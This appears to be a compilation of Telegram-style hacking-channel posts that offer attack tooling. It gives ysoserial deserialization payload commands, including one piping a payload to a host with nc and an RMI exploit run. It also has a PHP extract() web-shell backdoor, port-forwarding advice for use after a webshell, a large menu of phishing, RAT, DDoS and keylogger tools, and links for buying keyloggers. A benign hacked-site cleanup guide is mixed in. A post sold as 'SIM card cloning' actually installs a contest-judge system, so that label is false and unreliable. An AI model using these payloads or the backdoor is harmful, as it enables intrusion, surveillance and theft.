:(

▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑#EXPLOITATION :

> ysoserial is a collection of utilities and property-oriented programming "gadget chains" discovered in common java libraries that can, under the right conditions, exploit Java applications performing unsafe deserialization of objects. The main driver program takes a user-specified command and wraps it in the user-specified gadget chain, then serializes these objects to stdout. When an application with the required gadgets on the classpath unsafely deserializes this data, the chain will automatically be invoked and cause the command to be executed on the application host.

🄸🄽🅂🅃🄰🄻🄻🄸🅂🄰🅃🄸🄾🄽 & 🅁🅄🄽 :

1) downloadf https://jitpack.io/com/github/frohoff/ysoserial/master-SNAPSHOT/ysoserial-master-SNAPSHOT.jar
2) $ java -jar ysoserial.jar

3) Y SO SERIAL?
Usage: java -jar ysoserial.jar [payload] '[command]'

4) $ java -jar ysoserial.jar CommonsCollections1 calc.exe | xxd

0000000: aced 0005 7372 0032 7375 6e2e 7265 666c ....sr.2sun.refl

0000010: 6563 742e 616e 6e6f 7461 7469 6f6e 2e41 ect.annotation.A
0000020: 6e6e 6f74 6174 696f 6e49 6e76 6f63 6174 nnotationInvocat
...
0000550: 7672 0012 6a61 7661 2e6c 616e 672e 4f76 vr..java.lang.Ov
0000560: 6572 7269 6465 0000 0000 0000 0000 0000 erride..........
0000570: 0078 7071 007e 003a .xpq.~.:

5) $ java -jar ysoserial.jar Groovy1 calc.exe > groovypayload.bin

6) $ nc 10.10.10.10 1099 < groovypayload.bin

7) $ java -cp ysoserial.jar ysoserial.exploit.RMIRegistryExploit myhost 1099 CommonsCollections1 calc.exe

🦑R E Q U I R E M E N T S :

Requires Java 1.7+ and Maven 3.x+

mvn clean package -DskipTests

VERIFIED @undercodeTesting
▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑What should I do if the website is hacked and injected into the blog color page

Whenever there are competitions such as the European Cup, the World Cup, and the Olympic Games, various gaming groups resort to their best efforts to hack normal websites, especially high-traffic information websites. Through internal testing, Baidu found that the number of sites hacked during the European Cup is on the rise. Baidu has increased the efficiency and intensity of punishment. So, how can we avoid being hacked as a site?

[Self-check whether it has been hacked]

1. The hacked website has a feature in the data, that is, the amount of index and the traffic brought from search engines have increased dramatically in a short period of time . Therefore, the webmaster can benefit from the index volume tool of the Baidu webmaster platform to observe whether there is an abnormality in the site’s inclusion volume; if a sudden increase is found, use the traffic and keyword tool to check whether the keywords obtained are related to the website, whether it involves gambling and pornography .

2. Query the site through Site grammar, and combine some common pornographic and gambling keywords to achieve better results. It is possible to find illegal pages that do not belong to the site.

3. Due to the huge traffic of Baidu, some hacked behaviors only redirect the traffic brought by Baidu, which is difficult for the webmaster to find. Therefore, when checking whether your site is hacked, you must click on the site page from the Baidu search results to view Did you jump to other sites?

4. The content of the site is shown as risky in the search results.

*Subsequently, you can ask website technicians to further confirm whether the website is hacked through background data and programs

[How to deal with after being hacked]

After confirming that the website is hacked, in addition to prompting technical staff to make quick corrections, SEO staff also need to do some after-care and preventive work.

1. Immediately stop the website service to prevent users from continuing to be affected and prevent other sites from continuing to be affected (recommended to use the 503 return code).

2. If multiple sites of the same hosting provider are hacked during the same period, you can contact the hosting provider to urge the other party to respond.

3. Clean up the discovered hacked content, set the hacked page as a 404 dead link, and submit it through the dead link submission tool of the Baidu webmaster platform.

4. Check out the possible hacking time, compare it with the file modification time on the server, and deal with the files uploaded and modified by hackers; check the user management settings in the server to confirm whether there are abnormal changes; change the user of the server Access password. Note: The possible hacking time can be determined from the access log. However, the hacker may also modify the server's access log.

5. Do a good job in security, check the loopholes in the website, and prevent it from being hacked again.

The above is the processing method of the website being hacked into the blog color page.

@UndercodeTesting
▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑lcx usage experience (piracy)
example Why do port forwarding?

If an external network server, we can access it directly by connecting to its port without port forwarding.

Generally we are divided into four situations:

1. Intranet of this machine: It can be directly connected to the external network of the machine, for example, when we browse the website, connect in time Port 80 of the external network server;

2. External network of this machine: external network of other machine ----------------------------same as the above example;

3. External network of this machine: Intranet of other machine -------------------------If we open port 3389 of its server after getting the webshell, but when We connected to its port 3389 but couldn't connect to it. At this time, experienced people should have checked the status of the server and got webshell-check ipconfig. Everyone understands this, so I won't explain it! This is the second highlight of what I want to talk about: At this time, our idea is to forward its 3389 port. At this time, we will use lcx.exe.

@UndercodeTesting
▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑#FastTips effective popular ways for hack accounts :


1) Attacks at the software level
Injection of malware into the user's system or exploitation of vulnerabilities in existing software. This is still the most widespread and effective hacking method. The proliferation of antiviruses, built-in firewalls, forced inclusion of UAC, auto-updates, increasing the overall security of the OS somewhat improves the situation, but cannot 100% protect users from their own rash actions.

2) Attacks at the traffic level
There are two types of such attacks - in the form of a sniffer of unprotected traffic and in the form of attacks on protected traffic (man in the middle, MITM).

a- This method of hacking is more effective than the first one, but it is more difficult in technical implementation, therefore it has not become so widespread. First of all, due to the limited territoriality - the attack must be carried out directly on the incoming and outgoing connections, and for this you need to physically have access to them.

b-. The second method is that a secure connection occurs, but not between the user certificate and the server certificate, but between the attacker and the server (hence the name MITM - man-in-the-middle attack). After the implementation of the "necessary" certificate, the compromised traffic is available to the hacker in decrypted form, which allows him to extract and save credentials from it.


By the way, both of these methods are also used at the software level: when malware replaces a certificate or a software sniffer is running locally.

3) User-level attacks
Social engineering techniques, in other words, deliberately deceiving a user in order to obtain credentials. The victim is misled when communicating via Internet channels or the phone, after which she herself transfers everything necessary to the attacker. Despite the high labor costs, such an attack is very effective in obtaining a specific user account.


4) Attack at the server (service provider) level
An extremely rare type of attack. It is theoretically possible, but in practice it is extremely rare. Here it is worth debunking the popular myth about “the social network was hacked”: in such a situation, it was not the social network that was hacked, but the devices of a particular user. And, most likely, he himself helped the attacker in this, and the hacker used the trick from point 1 or a combination of tricks 1 and 3. Therefore, such a scenario as "hacked social networks", the user need not be afraid, but should be more attentive to their own actions.
@UndercodeTesting
▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

Hackingtool Menu 🧰
Anonymously Hiding Tools
Information gathering tools
Wordlist Generator
Wireless attack tools
SQL Injection Tools
Phishing attack tools
Web Attack tools
Post exploitation tools
Forensic tools
Payload creation tools
Exploit framework
Reverse engineering tools
DDOS Attack Tools
Remote Administrator Tools (RAT)
XSS Attack Tools
Steganograhy tools
Other tools
SocialMedia Bruteforce
Android Hacking tools
IDN Homograph Attack
Email Verify tools
Hash cracking tools
Wifi Deauthenticate
SocialMedia Finder
Payload Injector
Web crawling
Mix tools
Anonymously Hiding Tools
Anonmously Surf
Multitor
Information gathering tools
Network Map (nmap)
Dracnmap
Port scanning
Host to IP
Xerosploit
RED HAWK (All In One Scanning)
ReconSpider(For All Scaning)
IsItDown (Check Website Down/Up)
Infoga - Email OSINT
ReconDog
Striker
SecretFinder (like API & etc)
Find Info Using Shodan
Port Scanner - rang3r
Breacher
Wordlist Generator
Cupp
WordlistCreator
Goblin WordGenerator
Password list (1.4 Billion Clear Text Password)
Wireless attack tools
WiFi-Pumpkin
pixiewps
Bluetooth Honeypot GUI Framework
Fluxion
Wifiphisher
Wifite
EvilTwin
Fastssh
Howmanypeople
SQL Injection Tools
Sqlmap tool
NoSqlMap
Damn Small SQLi Scanner
Explo
Blisqy - Exploit Time-based blind-SQL injection
Leviathan - Wide Range Mass Audit Toolkit
SQLScan
Phishing attack tools
Setoolkit
SocialFish
HiddenEye
Evilginx2
I-See_You(Get Location using phishing attack)
SayCheese (Grab target's Webcam Shots)
QR Code Jacking
ShellPhish
BlackPhish
Web Attack tools
Web2Attack
Skipfish
SubDomain Finder
CheckURL
Blazy(Also Find ClickJacking)
Sub-Domain TakeOver
Dirb
Post exploitation tools
Vegile - Ghost In The Shell
Chrome Keylogger
Forensic tools
Autopsy
Wireshark
Bulk extractor
Disk Clone and ISO Image Aquire
Toolsley
Payload creation tools
The FatRat
Brutal
Stitch
MSFvenom Payload Creator
Venom Shellcode Generator
Spycam
Mob-Droid
Enigma
Exploit framework
RouterSploit
WebSploit
Commix
Web2Attack
Reverse engineering tools
Androguard
Apk2Gold
JadX
DDOS Attack Tools
SlowLoris
Asyncrone | Multifunction SYN Flood DDoS Weapon
UFOnet
GoldenEye
Remote Administrator Tools (RAT)
Stitch
Pyshell
XSS Attack Tools
DalFox(Finder of XSS)
XSS Payload Generator
Extended XSS Searcher and Finder
XSS-Freak
XSpear
XSSCon
XanXSS
Advanced XSS Detection Suite
RVuln
Steganograhy tools
SteganoHide
StegnoCracker
Whitespace
Other tools
SocialMedia Bruteforce
Instagram Attack
AllinOne SocialMedia Attack
Facebook Attack
Application Checker
Android Hacking tools
Keydroid
MySMS
Lockphish (Grab target LOCK PIN)
DroidCam (Capture Image)
EvilApp (Hijack Session)
HatCloud(Bypass CloudFlare for IP)
IDN Homograph Attack
EvilURL
Email Verify tools
Knockmail
Hash cracking tools
Hash Buster
Wifi Deauthenticate
WifiJammer-NG
KawaiiDeauther
SocialMedia Finder
Find SocialMedia By Facial Recognation System
Find SocialMedia By UserName
Sherlock
SocialScan | Username or Email
Payload Injector
Debinject
Pixload
Web crawling
Gospider

▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑NEW UPDATE ALL IN ONE REAL HACKING

🄸🄽🅂🅃🄰🄻🄻🄸🅂🄰🅃🄸🄾🄽 & 🅁🅄🄽 :

1) git clone https://github.com/Z4nzu/hackingtool.git

2) chmod -R 755 hackingtool

3) cd hackingtool

4) sudo pip3 install -r requirement.txt

5) bash install.sh

6) sudo hackingtool

@UndercodeTesting
▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑ODOR1-PHP extract backdoor usage methode :)
let's introduce a new PHP backdoor: extract function backdoor.

codecode show as below:

1) extract
(PHP 4, PHP 5)
extract — import variables from the array to the current symbol table
int extract (array &$var_array [, int $extract_type = EXTR_OVERWRITE [, string $prefix = NULL ]])
This function is used to The variables are imported from the array into the current symbol table.


2) Specific application:

1: PHP extract function in a variety of usage presentation
2: PHP extract () function
3: Official Document
4: php-backdoors-hidden- with-clever-use-of-extract-function
next surgeon launched :)

3) Server code:


<?@extract($_REQUEST);@die($err($info));?>

4) Finally, add various codes, tags and 404...you know (‵▽′)ψ


@UndercodeTesting
▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

Analysis of the evolution of the transparent tribe hacker organization
Let's see the truth #Cyberattack #Analyse

▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑BEST ANONYMOUS KEYLOGGERS(PAID/TRIALS/FREE)

https://mac.keylogger.org/

https://android.keylogger.org/

https://www.keyloggers.com/

https://netbull-keylogger.keyloggers.com/10/buy1click.html

http://staffcop-standard.keyloggers.com/review.html

http://spytector.keyloggers.com/review.html

https://all-in-one-keylogger.keyloggers.com/10/buy1click.html

https://refog-personal-monitor.keyloggers.com/11/buy1click.html

https://spyrix-personal-monitor-pro.keyloggers.com/12/buy1click.html

https://staffcop-standard.keyloggers.com/review.html

https://netbull-keylogger.keyloggers.com/review.html

https://refog-personal-monitor.keyloggers.com/review.html

https://total-logger.keyloggers.com/review.html

https://spytech-spyagent-standard-edition.keyloggers.com/review.html

@uNDERCODEtESTING
▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑A REAL FREE SIM CARD CLONING-OPEN SOURCE :)

R E Q U I R E M E N T S :

-gcc/g++ (with 32 bit support – for compiling submissions) with C++17 support (Debian package: g++-multilib)

-MariaDB (Debian package: mariadb-server)

-MariaDB client library (Debian packages: libmariadbclient-dev)

-libseccomp (Debian package: libseccomp-dev)

-GNU/Make (Debian package: make version >= 4.2.1)

-libzip (Debian package: libzip-dev)

🄸🄽🅂🅃🄰🄻🄻🄸🅂🄰🅃🄸🄾🄽 & 🅁🅄🄽 :

1) Debian
sudo apt-get install g++-multilib mariadb-server libmariadbclient-dev libseccomp-dev libzip-dev make libssl-dev

2) Ubuntu is not officially supported, you may try it, it may (not) work. Modern versions of some of the above packages are needed to build sim sucessfully.

3) Arch Linux

> sudo pacman -S gcc mariadb mariadb-libs libseccomp libzip make && \

> sudo mysql_install_db --user=mysql --basedir=/usr --datadir=/var/lib/mysql && \

> sudo systemctl enable mariadb && sudo systemctl start mariadb

🦑Instructions
In case you installed MariaDB server for the first time, you should run:

1️⃣sudo mysql_secure_installation
First of all clone the Sim repository and all its submodules

2️⃣git clone --recursive https://github.com/varqox/sim &&

3️⃣cd sim

4️⃣Build

5️⃣make -j $(nproc)

6️⃣Make sure that you have created MariaDB account and database for Sim, use command below to create user sim@localhost and database simdb (when asked for password, enter your mariadb root password, by default it is empty – if that does not work try running the below command with sudo):

> mysql -e "CREATE USER sim@localhost IDENTIFIED BY 'sim'; CREATE DATABASE simdb; GRANT ALL ON simdb.* TO 'sim'@'localhost';" -u root -p

7️⃣Install

8️⃣make install

9️⃣It will ask for MariaDB credentials. By default, step 4 created MariaDB username sim, password sim, database simdb and user host localhost.

🔟If you want to install Sim in other location that build/ type

make install DESTDIR=where-you-want-Sim-to-install
Run sim-server and job-machine
make run

1️⃣1️⃣If you have not installed Sim in the default location use command:

make run DESTDIR=where-you-installed-Sim

1️⃣2️⃣You can combine building, installation and running commands into:

make all install run

1️⃣3️⃣Enter http://127.7.7.7:8080 via your web browser, by default a Sim root account was created there
username: sim
password: sim

1️⃣4️⃣Remember to change the password now (or later) if you want to make Sim website accessible to others. Do not make hacker's life easier!

Well done! You have just installed Sim. There is a sim-server configuration file where-you-installed-Sim/sim.conf (build/sim.conf by default) where server parameters like address, workers etc. are. Also, there are log files log/*.log that you would find useful if something didn't work.

1️⃣5️⃣If you want to run Sim at system startup then you can use crontab -- just add these lines to your crontab (using command crontab -e):

@reboot sh -c 'until test -e /var/run/mysqld/mysqld.sock; do sleep 0.4; done; BUILD="where-you-installed-Sim"; "$BUILD/sim-server"& "$BUILD/job-server"&'
where-you-installed-Sim = absolute path to Sim build directory e.g. /home/your_username/sim/build

ANY DOUBT ASK @Undercode_Testing
ENJOY ❤️👍🏻
▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁